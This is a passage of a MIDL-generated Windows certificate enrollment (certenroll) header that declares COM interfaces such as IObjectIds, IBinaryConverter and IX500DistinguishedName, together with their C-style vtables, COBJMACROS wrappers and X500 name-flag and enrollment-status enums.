    ( (This)->lpVtbl -> InitializeFromName(This,Name) ) 

#define IObjectId_InitializeFromValue(This,strValue)	\
    ( (This)->lpVtbl -> InitializeFromValue(This,strValue) ) 

#define IObjectId_InitializeFromAlgorithmName(This,GroupId,KeyFlags,AlgFlags,strAlgorithmName)	\
    ( (This)->lpVtbl -> InitializeFromAlgorithmName(This,GroupId,KeyFlags,AlgFlags,strAlgorithmName) ) 

#define IObjectId_get_Name(This,pValue)	\
    ( (This)->lpVtbl -> get_Name(This,pValue) ) 

#define IObjectId_get_FriendlyName(This,pValue)	\
    ( (This)->lpVtbl -> get_FriendlyName(This,pValue) ) 

#define IObjectId_put_FriendlyName(This,Value)	\
    ( (This)->lpVtbl -> put_FriendlyName(This,Value) ) 

#define IObjectId_get_Value(This,pValue)	\
    ( (This)->lpVtbl -> get_Value(This,pValue) ) 

#define IObjectId_GetAlgorithmName(This,GroupId,KeyFlags,pstrAlgorithmName)	\
    ( (This)->lpVtbl -> GetAlgorithmName(This,GroupId,KeyFlags,pstrAlgorithmName) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IObjectId_INTERFACE_DEFINED__ */


#ifndef __IObjectIds_INTERFACE_DEFINED__
#define __IObjectIds_INTERFACE_DEFINED__

/* interface IObjectIds */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IObjectIds;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab301-217d-11da-b2a4-000e7bbb2b09")
    IObjectIds : public IDispatch
    {
    public:
        virtual /* [helpstring][id][propget][custom] */ HRESULT STDMETHODCALLTYPE get_ItemByIndex( 
            /* [in] */ LONG Index,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **pVal) = 0;
        
        virtual /* [helpstring][id][propget][custom] */ HRESULT STDMETHODCALLTYPE get_Count( 
            /* [retval][out] */ __RPC__out long *pVal) = 0;
        
        virtual /* [restricted][helpstring][id][propget] */ HRESULT STDMETHODCALLTYPE get__NewEnum( 
            /* [retval][out] */ __RPC__deref_out_opt LPUNKNOWN *pVal) = 0;
        
        virtual /* [helpstring][id][custom] */ HRESULT STDMETHODCALLTYPE Add( 
            /* [in] */ __RPC__in_opt IObjectId *pVal) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Remove( 
            /* [in] */ LONG Index) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Clear( void) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE AddRange( 
            /* [in] */ __RPC__in_opt IObjectIds *pValue) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct IObjectIdsVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IObjectIds * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IObjectIds * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IObjectIds * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IObjectIds * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IObjectIds * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IObjectIds * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IObjectIds * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        /* [helpstring][id][propget][custom] */ HRESULT ( STDMETHODCALLTYPE *get_ItemByIndex )( 
            __RPC__in IObjectIds * This,
            /* [in] */ LONG Index,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **pVal);
        
        /* [helpstring][id][propget][custom] */ HRESULT ( STDMETHODCALLTYPE *get_Count )( 
            __RPC__in IObjectIds * This,
            /* [retval][out] */ __RPC__out long *pVal);
        
        /* [restricted][helpstring][id][propget] */ HRESULT ( STDMETHODCALLTYPE *get__NewEnum )( 
            __RPC__in IObjectIds * This,
            /* [retval][out] */ __RPC__deref_out_opt LPUNKNOWN *pVal);
        
        /* [helpstring][id][custom] */ HRESULT ( STDMETHODCALLTYPE *Add )( 
            __RPC__in IObjectIds * This,
            /* [in] */ __RPC__in_opt IObjectId *pVal);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Remove )( 
            __RPC__in IObjectIds * This,
            /* [in] */ LONG Index);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Clear )( 
            __RPC__in IObjectIds * This);
        
        HRESULT ( STDMETHODCALLTYPE *AddRange )( 
            __RPC__in IObjectIds * This,
            /* [in] */ __RPC__in_opt IObjectIds *pValue);
        
        END_INTERFACE
    } IObjectIdsVtbl;

    interface IObjectIds
    {
        CONST_VTBL struct IObjectIdsVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IObjectIds_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IObjectIds_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IObjectIds_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IObjectIds_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IObjectIds_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IObjectIds_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IObjectIds_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IObjectIds_get_ItemByIndex(This,Index,pVal)	\
    ( (This)->lpVtbl -> get_ItemByIndex(This,Index,pVal) ) 

#define IObjectIds_get_Count(This,pVal)	\
    ( (This)->lpVtbl -> get_Count(This,pVal) ) 

#define IObjectIds_get__NewEnum(This,pVal)	\
    ( (This)->lpVtbl -> get__NewEnum(This,pVal) ) 

#define IObjectIds_Add(This,pVal)	\
    ( (This)->lpVtbl -> Add(This,pVal) ) 

#define IObjectIds_Remove(This,Index)	\
    ( (This)->lpVtbl -> Remove(This,Index) ) 

#define IObjectIds_Clear(This)	\
    ( (This)->lpVtbl -> Clear(This) ) 

#define IObjectIds_AddRange(This,pValue)	\
    ( (This)->lpVtbl -> AddRange(This,pValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IObjectIds_INTERFACE_DEFINED__ */


#ifndef __IBinaryConverter_INTERFACE_DEFINED__
#define __IBinaryConverter_INTERFACE_DEFINED__

/* interface IBinaryConverter */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IBinaryConverter;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab302-217d-11da-b2a4-000e7bbb2b09")
    IBinaryConverter : public IDispatch
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE StringToString( 
            /* [in] */ __RPC__in BSTR strEncodedIn,
            /* [in] */ EncodingType EncodingIn,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pstrEncoded) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE VariantByteArrayToString( 
            /* [in] */ __RPC__in VARIANT *pvarByteArray,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pstrEncoded) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE StringToVariantByteArray( 
            /* [in] */ __RPC__in BSTR strEncoded,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__out VARIANT *pvarByteArray) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct IBinaryConverterVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IBinaryConverter * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IBinaryConverter * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IBinaryConverter * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IBinaryConverter * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IBinaryConverter * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IBinaryConverter * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IBinaryConverter * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *StringToString )( 
            __RPC__in IBinaryConverter * This,
            /* [in] */ __RPC__in BSTR strEncodedIn,
            /* [in] */ EncodingType EncodingIn,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pstrEncoded);
        
        HRESULT ( STDMETHODCALLTYPE *VariantByteArrayToString )( 
            __RPC__in IBinaryConverter * This,
            /* [in] */ __RPC__in VARIANT *pvarByteArray,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pstrEncoded);
        
        HRESULT ( STDMETHODCALLTYPE *StringToVariantByteArray )( 
            __RPC__in IBinaryConverter * This,
            /* [in] */ __RPC__in BSTR strEncoded,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__out VARIANT *pvarByteArray);
        
        END_INTERFACE
    } IBinaryConverterVtbl;

    interface IBinaryConverter
    {
        CONST_VTBL struct IBinaryConverterVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IBinaryConverter_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IBinaryConverter_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IBinaryConverter_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IBinaryConverter_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IBinaryConverter_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IBinaryConverter_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IBinaryConverter_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IBinaryConverter_StringToString(This,strEncodedIn,EncodingIn,Encoding,pstrEncoded)	\
    ( (This)->lpVtbl -> StringToString(This,strEncodedIn,EncodingIn,Encoding,pstrEncoded) ) 

#define IBinaryConverter_VariantByteArrayToString(This,pvarByteArray,Encoding,pstrEncoded)	\
    ( (This)->lpVtbl -> VariantByteArrayToString(This,pvarByteArray,Encoding,pstrEncoded) ) 

#define IBinaryConverter_StringToVariantByteArray(This,strEncoded,Encoding,pvarByteArray)	\
    ( (This)->lpVtbl -> StringToVariantByteArray(This,strEncoded,Encoding,pvarByteArray) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IBinaryConverter_INTERFACE_DEFINED__ */


#ifndef __IBinaryConverter2_INTERFACE_DEFINED__
#define __IBinaryConverter2_INTERFACE_DEFINED__

/* interface IBinaryConverter2 */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IBinaryConverter2;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("8D7928B4-4E17-428D-9A17-728DF00D1B2B")
    IBinaryConverter2 : public IBinaryConverter
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE StringArrayToVariantArray( 
            /* [in] */ __RPC__in VARIANT *pvarStringArray,
            /* [retval][out] */ __RPC__out VARIANT *pvarVariantArray) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE VariantArrayToStringArray( 
            /* [in] */ __RPC__in VARIANT *pvarVariantArray,
            /* [retval][out] */ __RPC__out VARIANT *pvarStringArray) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct IBinaryConverter2Vtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IBinaryConverter2 * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IBinaryConverter2 * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IBinaryConverter2 * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IBinaryConverter2 * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IBinaryConverter2 * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IBinaryConverter2 * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IBinaryConverter2 * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *StringToString )( 
            __RPC__in IBinaryConverter2 * This,
            /* [in] */ __RPC__in BSTR strEncodedIn,
            /* [in] */ EncodingType EncodingIn,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pstrEncoded);
        
        HRESULT ( STDMETHODCALLTYPE *VariantByteArrayToString )( 
            __RPC__in IBinaryConverter2 * This,
            /* [in] */ __RPC__in VARIANT *pvarByteArray,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pstrEncoded);
        
        HRESULT ( STDMETHODCALLTYPE *StringToVariantByteArray )( 
            __RPC__in IBinaryConverter2 * This,
            /* [in] */ __RPC__in BSTR strEncoded,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__out VARIANT *pvarByteArray);
        
        HRESULT ( STDMETHODCALLTYPE *StringArrayToVariantArray )( 
            __RPC__in IBinaryConverter2 * This,
            /* [in] */ __RPC__in VARIANT *pvarStringArray,
            /* [retval][out] */ __RPC__out VARIANT *pvarVariantArray);
        
        HRESULT ( STDMETHODCALLTYPE *VariantArrayToStringArray )( 
            __RPC__in IBinaryConverter2 * This,
            /* [in] */ __RPC__in VARIANT *pvarVariantArray,
            /* [retval][out] */ __RPC__out VARIANT *pvarStringArray);
        
        END_INTERFACE
    } IBinaryConverter2Vtbl;

    interface IBinaryConverter2
    {
        CONST_VTBL struct IBinaryConverter2Vtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IBinaryConverter2_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IBinaryConverter2_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IBinaryConverter2_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IBinaryConverter2_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IBinaryConverter2_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IBinaryConverter2_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IBinaryConverter2_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IBinaryConverter2_StringToString(This,strEncodedIn,EncodingIn,Encoding,pstrEncoded)	\
    ( (This)->lpVtbl -> StringToString(This,strEncodedIn,EncodingIn,Encoding,pstrEncoded) ) 

#define IBinaryConverter2_VariantByteArrayToString(This,pvarByteArray,Encoding,pstrEncoded)	\
    ( (This)->lpVtbl -> VariantByteArrayToString(This,pvarByteArray,Encoding,pstrEncoded) ) 

#define IBinaryConverter2_StringToVariantByteArray(This,strEncoded,Encoding,pvarByteArray)	\
    ( (This)->lpVtbl -> StringToVariantByteArray(This,strEncoded,Encoding,pvarByteArray) ) 


#define IBinaryConverter2_StringArrayToVariantArray(This,pvarStringArray,pvarVariantArray)	\
    ( (This)->lpVtbl -> StringArrayToVariantArray(This,pvarStringArray,pvarVariantArray) ) 

#define IBinaryConverter2_VariantArrayToStringArray(This,pvarVariantArray,pvarStringArray)	\
    ( (This)->lpVtbl -> VariantArrayToStringArray(This,pvarVariantArray,pvarStringArray) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IBinaryConverter2_INTERFACE_DEFINED__ */


/* interface __MIDL_itf_certenroll_0000_0004 */
/* [local] */ 

typedef 
enum X500NameFlags
    {
        XCN_CERT_NAME_STR_NONE	= 0,
        XCN_CERT_SIMPLE_NAME_STR	= 1,
        XCN_CERT_OID_NAME_STR	= 2,
        XCN_CERT_X500_NAME_STR	= 3,
        XCN_CERT_XML_NAME_STR	= 4,
        XCN_CERT_NAME_STR_SEMICOLON_FLAG	= 0x40000000,
        XCN_CERT_NAME_STR_NO_PLUS_FLAG	= 0x20000000,
        XCN_CERT_NAME_STR_NO_QUOTING_FLAG	= 0x10000000,
        XCN_CERT_NAME_STR_CRLF_FLAG	= 0x8000000,
        XCN_CERT_NAME_STR_COMMA_FLAG	= 0x4000000,
        XCN_CERT_NAME_STR_REVERSE_FLAG	= 0x2000000,
        XCN_CERT_NAME_STR_FORWARD_FLAG	= 0x1000000,
        XCN_CERT_NAME_STR_AMBIGUOUS_SEPARATOR_FLAGS	= ( ( 0x40000000 | 0x8000000 )  | 0x4000000 ) ,
        XCN_CERT_NAME_STR_DISABLE_IE4_UTF8_FLAG	= 0x10000,
        XCN_CERT_NAME_STR_ENABLE_T61_UNICODE_FLAG	= 0x20000,
        XCN_CERT_NAME_STR_ENABLE_UTF8_UNICODE_FLAG	= 0x40000,
        XCN_CERT_NAME_STR_FORCE_UTF8_DIR_STR_FLAG	= 0x80000,
        XCN_CERT_NAME_STR_DISABLE_UTF8_DIR_STR_FLAG	= 0x100000,
        XCN_CERT_NAME_STR_ENABLE_PUNYCODE_FLAG	= 0x200000,
        XCN_CERT_NAME_STR_DS_ESCAPED	= 0x800000
    } 	X500NameFlags;



extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0004_v0_0_c_ifspec;
extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0004_v0_0_s_ifspec;

#ifndef __IX500DistinguishedName_INTERFACE_DEFINED__
#define __IX500DistinguishedName_INTERFACE_DEFINED__

/* interface IX500DistinguishedName */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX500DistinguishedName;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab303-217d-11da-b2a4-000e7bbb2b09")
    IX500DistinguishedName : public IDispatch
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE Decode( 
            /* [in] */ __RPC__in BSTR strEncodedName,
            /* [defaultvalue][in] */ EncodingType Encoding = XCN_CRYPT_STRING_BASE64,
            /* [defaultvalue][in] */ X500NameFlags NameFlags = XCN_CERT_NAME_STR_NONE) = 0;
        
        virtual /* [custom] */ HRESULT STDMETHODCALLTYPE Encode( 
            /* [in] */ __RPC__in BSTR strName,
            /* [defaultvalue][in] */ X500NameFlags NameFlags = XCN_CERT_NAME_STR_NONE) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Name( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_EncodedName( 
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct IX500DistinguishedNameVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX500DistinguishedName * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX500DistinguishedName * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX500DistinguishedName * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX500DistinguishedName * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX500DistinguishedName * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX500DistinguishedName * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX500DistinguishedName * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *Decode )( 
            __RPC__in IX500DistinguishedName * This,
            /* [in] */ __RPC__in BSTR strEncodedName,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [defaultvalue][in] */ X500NameFlags NameFlags);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *Encode )( 
            __RPC__in IX500DistinguishedName * This,
            /* [in] */ __RPC__in BSTR strName,
            /* [defaultvalue][in] */ X500NameFlags NameFlags);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Name )( 
            __RPC__in IX500DistinguishedName * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_EncodedName )( 
            __RPC__in IX500DistinguishedName * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        END_INTERFACE
    } IX500DistinguishedNameVtbl;

    interface IX500DistinguishedName
    {
        CONST_VTBL struct IX500DistinguishedNameVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX500DistinguishedName_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX500DistinguishedName_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX500DistinguishedName_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX500DistinguishedName_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX500DistinguishedName_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX500DistinguishedName_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX500DistinguishedName_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX500DistinguishedName_Decode(This,strEncodedName,Encoding,NameFlags)	\
    ( (This)->lpVtbl -> Decode(This,strEncodedName,Encoding,NameFlags) ) 

#define IX500DistinguishedName_Encode(This,strName,NameFlags)	\
    ( (This)->lpVtbl -> Encode(This,strName,NameFlags) ) 

#define IX500DistinguishedName_get_Name(This,pValue)	\
    ( (This)->lpVtbl -> get_Name(This,pValue) ) 

#define IX500DistinguishedName_get_EncodedName(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_EncodedName(This,Encoding,pValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX500DistinguishedName_INTERFACE_DEFINED__ */


/* interface __MIDL_itf_certenroll_0000_0005 */
/* [local] */ 

typedef 
enum X509CertificateEnrollmentContext
    {
        ContextNone	= 0,
        ContextUser	= 0x1,
        ContextMachine	= 0x2,
        ContextAdministratorForceMachine	= 0x3
    } 	X509CertificateEnrollmentContext;

typedef 
enum EnrollmentEnrollStatus
    {
        Enrolled	= 0x1,
        EnrollPended	= 0x2,
        EnrollUIDeferredEnrollmentRequired	= 0x4,
        EnrollError	= 0x10,
        EnrollUnknown	= 0x20,
        EnrollSkipped	= 0x40,
        EnrollDenied	= 0x100
    } 	EnrollmentEnrollStatus;

typedef 
enum EnrollmentSelectionStatus
    {
        SelectedNo	= 0,
        SelectedYes	= 1
    } 	EnrollmentSelectionStatus;

typedef 
enum EnrollmentDisplayStatus
    {
        DisplayNo	= 0,
        DisplayYes	= 1
    } 	EnrollmentDisplayStatus;



extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0005_v0_0_c_ifspec;
